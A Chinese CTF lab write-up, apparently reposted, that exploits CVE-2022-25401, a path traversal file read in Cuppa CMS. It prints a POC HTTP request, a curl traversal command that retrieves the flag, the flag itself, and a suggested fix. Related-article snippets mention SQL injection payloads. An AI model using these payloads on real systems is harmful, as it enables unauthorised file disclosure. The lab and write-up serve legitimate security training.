春秋云境:CVE-2022-25401(任意文件读取漏洞)

这篇具有很好参考价值的文章主要介绍了春秋云境:CVE-2022-25401(任意文件读取漏洞)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、题目

二、curl访问flag文件


一、题目

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

介绍:

        Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞 

进入题目 是一个登录页面

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

sql和暴破都无解。

官方POC

 国家信息安全漏洞库

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

cve漏洞介绍

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

官方给错了目录 没有administrator/ 找不到

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

官方poc

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

 代码块:

POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: 192.168.174.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini

 burp抓包改包:不过没成功:可能是目录问题。

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

二、curl访问flag文件

 进入目录templates/default/html/windows/right.php  

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

这里返回空白页是表示有这个文件的,如果不存在会返回404。

进入templates/default/html目录

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

 windows目录下right.php

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

 查看源码:

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

 kali的curl请求访问根目录下的flag文件

        curl是一种命令行工具,作用是发出网络请求,然后得到和提取数据,显示在"标准输出"(stdout)上面。 它支持多种协议 查看网页源码 直接在curl命令后加上网址,就可以看到网页源码。

curl -X POST "http://xxx.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

 得到flag

春秋云境:CVE-2022-25401(任意文件读取漏洞),i春秋,php,开发语言,web安全,网络安全,安全

flag{fa417734-dac9-4947-831f-67b3ed302120} 

附:

漏洞修复建议
在 ‘/templates/default/html/windows/right.php’ 文件处,第53行建议添加以下代码:

$url = $_POST["url"];
if(strstr($url, "../") || strstr($url, "..\\")){
    echo "Security attack!";
    exit;
}
include realpath(DIR . '/../../../..')."/".$url;


 文章来源地址https://www.toymoban.com/news/detail-684895.html

到了这里,关于春秋云境:CVE-2022-25401(任意文件读取漏洞)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 春秋云境:CVE-2022-28060

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Victor CMS v1.0 /includes/login.php 存在sql注入 解题步骤 访问URL,在登录过程中抓包: 探测存在SQL注入: 1\\\'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+\\\'1\\\'=\\\' 使用Sqlmap获取flag,通过–sql-shell再传入load_file进行文件读取: 文章合集 :春秋云境

    2024年02月12日
    浏览(69)
  • 春秋云境:CVE-2022-24124

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。 解题步骤 题外话 这个题

    2024年02月01日
    浏览(40)
  • 春秋云境:CVE-2022-26965

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Pluck-CMS-Pluck-4.7.16 后台RCE 解题步骤 过弱口令登录:admin 登录之后按照图中位置进行主题安装 按照这位大哥文章: https://blog.csdn.net/weixin_39639260/article/details/116105945 中说的,需要将主题中的info.php文件修改,再打包成zip再上

    2024年02月04日
    浏览(52)
  • 春秋云境:CVE-2022-24112

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于

    2024年02月06日
    浏览(42)
  • 【春秋云境】CVE-2022-32991

    靶标介绍: ​ 该CMS的welcome.php中存在SQL注入攻击 介绍中就很明显提示了welcome.php中存在SQL注入,那么就直接访问。但是要先登录,我们直接注册一个进去。 注册完登录进去就发现有问题: 根据CVE官方: ​ 在 welcome.php ,发现基于 Web 的测验系统 v1.0 通过 eid 参数 包含一个

    2024年02月12日
    浏览(36)
  • 春秋云境:CVE-2022-28525

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 ED01-CMS v20180505 存在任意文件上传漏洞 解题步骤 访问URL 通过弱口令进行登录:admin/admin 登录后在图中位置点击进行图片更新,需要将密码等都写上 抓包将图片信息进行替换,并修改文件名 上传成功后访问上传的shell并执

    2024年02月11日
    浏览(56)
  • 春秋云境:CVE-2022-32991(SQL注入)

    一.i春秋  二.手工注入 三.sqlmap注入 1.sqlmap注入---文件.txt 2.sqlmap--参数 附:sql注入命令 靶标介绍: 该CMS的welcome.php中存在SQL注入攻击。 打开是一个登录注册页面:  点击登录:url看着也没有sql注入 随意输入邮箱和密码:  并用bp抓包  回显用户名或者密码错误: 考虑到要找

    2024年02月06日
    浏览(40)
  • Cuppa CMS 访问控制错误漏洞(CVE-2022-25401)

    0x01 漏洞介绍 CuppaCMS 是一套内容管理系统(CMS)。 Cuppa CMS 中存在访问控制错误漏洞,该漏洞源于产品的文件拷贝函数允许将任意文件拷贝至当前目录。 攻击者可通过该漏洞读取任意文件。 Cuppa CMS v1.0 中文件管理器得复制功能允许将任何文件复制到当前目录,从而授予攻击者

    2024年02月06日
    浏览(43)
  • 【漏洞复现】Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)

    1. 漏洞简介 Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们可以通过修改访问某控制器的请求包,通过…/…/…/…/来达到路径穿越的目的,然后再通过{{来闭合模板查询路径,那我们访问的文件会被当做外部

    2024年02月04日
    浏览(59)
  • 【高危】Apache Airflow Spark Provider 任意文件读取漏洞 (CVE-2023-40272)

    Apache Airflow Spark Provider是Apache Airflow项目的一个插件,用于在Airflow中管理和调度Apache Spark作业。 受影响版本中,在JDBC连接时,由于没有对conn_prefix参数做验证,允许输入\\\"?\\\"来指定参数。攻击者可以通过构造参数?allowLoadLocalInfile=true连接攻击者控制的恶意mysql服务器,读取Airfl

    2024年02月11日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包